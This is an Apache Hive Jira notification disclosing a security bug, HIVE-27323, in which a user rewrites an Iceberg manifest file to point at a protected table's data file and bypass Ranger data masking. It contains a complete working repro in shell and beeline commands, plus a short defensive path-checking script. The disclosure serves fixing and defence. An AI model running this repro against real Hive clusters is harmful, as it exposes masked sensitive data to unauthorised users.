[ 
https://issues.apache.org/jira/browse/HIVE-27323?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Attila Turoczy updated HIVE-27323:
----------------------------------
    Labels: check  (was: )

> Iceberg: malformed manifest file or list can cause data breach
> --------------------------------------------------------------
>
>                 Key: HIVE-27323
>                 URL: https://issues.apache.org/jira/browse/HIVE-27323
>             Project: Hive
>          Issue Type: Bug
>          Components: Iceberg integration
>    Affects Versions: 4.0.0-alpha-2
>            Reporter: Janos Kovacs
>            Priority: Blocker
>              Labels: check
>
> Set to bug/blocker instead of enhancement because of its security-related 
> nature; Hive 4 should not be released without a fix for this. Please reset 
> if needed.
>  
> FYI: this is similar to HIVE-27322, but it depends more on Iceberg's 
> internals and cannot be fixed simply via the storage handler authorizer.
>  
> Context: 
>  * There are some core tables with sensitive data that users can only query 
> with data masking enforced (e.g. via Ranger). Let's assume this is the 
> `default.icebergsecured` table.
>  * An end user can only access the masked form of the sensitive data, as 
> expected.
>  * The users also have the privilege to create new tables in their own 
> sandbox databases. Let's assume this is the `default.trojanhorseviadata` 
> table for now.
>  * The user can create a malicious table that exposes the sensitive data 
> unmasked, leading to a possible data breach.
>  * Hive runs with doAs=false so that it can enforce FGAC and so that end 
> users need no direct file-system access.
>  
> Repro:
>  * First make sure the data is secured by the masking policy:
> {noformat}
> <kinit as privileged user>
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) 
> STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES
>   ('You might be allowed to see this.', 'You are NOT allowed to see this!');
> "
> <kinit as end user>
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +------------------------------------+--------------------------------+
> |         icebergsecured.txt         |     icebergsecured.secret      |
> +------------------------------------+--------------------------------+
> | You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
> +------------------------------------+--------------------------------+
> {noformat}
>  * Now let the user create the malicious table exposing the sensitive data:
> {noformat}
> <kinit as end user>
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorseviadata;
> CREATE EXTERNAL TABLE default.trojanhorseviadata (txt string, secret string) 
> STORED BY ICEBERG
> LOCATION '/some-user-writeable-location/trojanhorseviadata';
> INSERT INTO default.trojanhorseviadata VALUES ('placeholder','placeholder');
> "
> # Path of the data file that backs the secured table
> SECURE_DATA_FILE=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" \
>   beeline --outputformat=csv2 --showHeader=false --verbose=false \
>     --showWarnings=false --silent=true --report=false \
>     -e "SELECT file_path FROM default.icebergsecured.files;" 2>/dev/null)
> # Current metadata JSON of the trojan table
> TROJAN_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" \
>   beeline -e "DESCRIBE FORMATTED default.trojanhorseviadata;" 2>/dev/null \
>   | grep metadata_location | grep -v previous_metadata_location \
>   | awk '{print $5}')
> # Fetch the manifest list, then the manifest file it points to
> TROJAN_MANIFESTLIST_LOCATION=$(hdfs dfs -cat "$TROJAN_META_LOCATION" \
>   | grep "manifest-list" | cut -f4 -d\")
> hdfs dfs -get "$TROJAN_MANIFESTLIST_LOCATION"
> TROJAN_MANIFESTLIST=$(basename "$TROJAN_MANIFESTLIST_LOCATION")
> TROJAN_MANIFESTFILE_LOCATION=$(avro-tools tojson "$TROJAN_MANIFESTLIST" \
>   | jq '.manifest_path' | tr -d \")
> hdfs dfs -get "$TROJAN_MANIFESTFILE_LOCATION"
> TROJAN_MANIFESTFILE=$(basename "$TROJAN_MANIFESTFILE_LOCATION")
> mv "${TROJAN_MANIFESTFILE}" "${TROJAN_MANIFESTFILE}.orig"
> # Point the manifest entry at the secured table's data file and re-encode it
> avro-tools tojson "${TROJAN_MANIFESTFILE}.orig" \
>   | jq --arg fp "$SECURE_DATA_FILE" '.data_file.file_path = $fp' \
>   > "${TROJAN_MANIFESTFILE}.json"
> avro-tools getschema "${TROJAN_MANIFESTFILE}.orig" > "${TROJAN_MANIFESTFILE}.schema"
> avro-tools fromjson --codec deflate \
>   --schema-file "${TROJAN_MANIFESTFILE}.schema" "${TROJAN_MANIFESTFILE}.json" \
>   > "${TROJAN_MANIFESTFILE}.new"
> # Overwrite the original manifest and query the trojan table
> hdfs dfs -put -f "${TROJAN_MANIFESTFILE}.new" "$TROJAN_MANIFESTFILE_LOCATION"
> beeline -e "SELECT * FROM default.trojanhorseviadata;"
> +------------------------------------+-----------------------------------+
> |       trojanhorseviadata.txt       |     trojanhorseviadata.secret     |
> +------------------------------------+-----------------------------------+
> | You might be allowed to see this.  | You are NOT allowed to see this!  |
> +------------------------------------+-----------------------------------+
> {noformat}
>  
> There are several ways to create such a table and modify the manifest file 
> or manifest list, such as reusing parts of the Iceberg code or using Spark, 
> which needs direct end-user write access to the file system.
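
The manipulation in the repro comes down to a manifest entry whose file_path points outside the table's own location. As a minimal sketch, not taken from the report and not Hive's or Iceberg's actual behaviour or fix, the shell function below (the name find_foreign_paths is hypothetical) reads file paths from stdin and prints those that are not under a given table location. It is a plain string-prefix check: it assumes the paths and the location use the same scheme and authority, and it does not normalise `..` segments.

```shell
#!/bin/sh
# Hypothetical helper, for illustration only.
# Usage: <producer of file paths> | find_foreign_paths <table-location>
# Prints every path from stdin that is NOT under <table-location>.
# Pure string comparison; no file-system access happens here.
find_foreign_paths() {
  table_location="${1%/}"            # drop one trailing slash, if present
  while IFS= read -r file_path; do
    case "$file_path" in
      "") ;;                         # ignore blank lines
      "$table_location"/*) ;;        # lives inside the table directory
      *) printf '%s\n' "$file_path" ;;   # points somewhere else
    esac
  done
}
```

The paths could come, for example, from `avro-tools tojson <manifest> | jq -r '.data_file.file_path'`, the same tools the repro uses, piped into `find_foreign_paths "<table location>"`. Iceberg tables can legitimately reference data files outside the table location, so a hit is a hint for review, not proof of tampering.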



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
